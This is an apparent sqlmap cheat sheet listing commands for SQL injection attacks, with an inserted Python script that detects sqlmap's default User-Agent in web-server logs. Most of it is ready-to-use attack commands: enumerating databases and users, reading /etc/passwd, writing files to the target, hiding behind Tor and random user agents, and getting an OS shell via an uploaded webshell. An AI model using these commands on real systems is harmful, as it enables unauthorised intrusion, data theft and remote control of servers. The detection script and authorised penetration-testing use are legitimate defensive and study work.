sqlmap
Verbose Level (-v)
0: displays critical info only
1: displays warning info
2: displays debug info
3: displays payload used
4: displays HTTP request body
5: displays HTTP response headers
6: displays HTTP response body
Database Connection (-d)
Connect to a database with credential:
sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>
or connect to a database file:
sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>
GET (-u)
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
POST (--data)
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
Load Request from a File (-r)
sqlmap -r <request_from_burp>
Cookie (--cookie)
sqlmap -u <url> --cookie <cookie>
User-Agent (--user-agent)
The default User-Agent header sent by sqlmap is sqlmap/1.0-dev-xxxxxxx, but we can specify a User-Agent header:
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
or set a random user agent:
sqlmap -u <url> --random-agent -f --banner --dbs --users
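The default User-Agent above is also the simplest thing a defender can alert on. The following is an added example (not part of the original cheat sheet) that scans web-server access logs in the combined log format for requests carrying a sqlmap User-Agent; the log lines and IP addresses are constructed samples. Note that a scan run with --random-agent will not be caught by this check.

```python
import re
from typing import Optional

# Apache/Nginx "combined" log format (constructed regex for this example).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines; the sqlmap User-Agent forms follow the
# "sqlmap/<version>" pattern named on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-abc1234 (http://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "POST /vuln.php HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0"
"""


def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def is_sqlmap_ua(ua: str) -> bool:
    """True when the User-Agent is sqlmap's default (tool name prefix, any version)."""
    return ua.lower().startswith("sqlmap/")


def find_sqlmap_requests(log_text: str) -> list:
    """Return the parsed records whose User-Agent identifies sqlmap."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_sqlmap_ua(rec["ua"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in find_sqlmap_requests(SAMPLE_LOG):
        print(f'{rec["ip"]} {rec["method"]} {rec["path"]} UA={rec["ua"]}')
```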
Level (--level)
--level=1: default mode
--level=2: adds cookie testing
--level=3: adds User-Agent testing
--level=4: more testing
--level=5: adds Host testing
Risk (--risk)
--risk=1: (Default) innocuous injections
--risk=2: Enables heavy time-based injections
--risk=3: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table
Proxy (--proxy) and Tor (--tor)
Proxy:
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
Tor:
sqlmap --tor -u <url> -f --banner --dbs --users
Blind SQLi (--string, --not-string)
--string: a string which is always present in the True output page
--not-string: a string which is always present in the False output page
Privilege Enumeration (--is-dba)
Determine if the current user is the database admin:
sqlmap -u <url> --is-dba
Download/Upload (--file-read/--file-write/--file-dest)
Download a file:
sqlmap -u <url> --file-read /etc/passwd
Upload a file:
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
RCE (--os-shell)
The following requirements must be satisfied for --os-shell to work:
We have write permission
Pathnames are default
PHP magic_quotes_gpc is disabled
sqlmap -u <url> --os-shell
Behind the scenes, sqlmap creates an "upload trojan" on the target machine and uploads a webshell through it.
If the -d option is used, sqlmap will use a UDF (user-defined function) instead. For example:
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell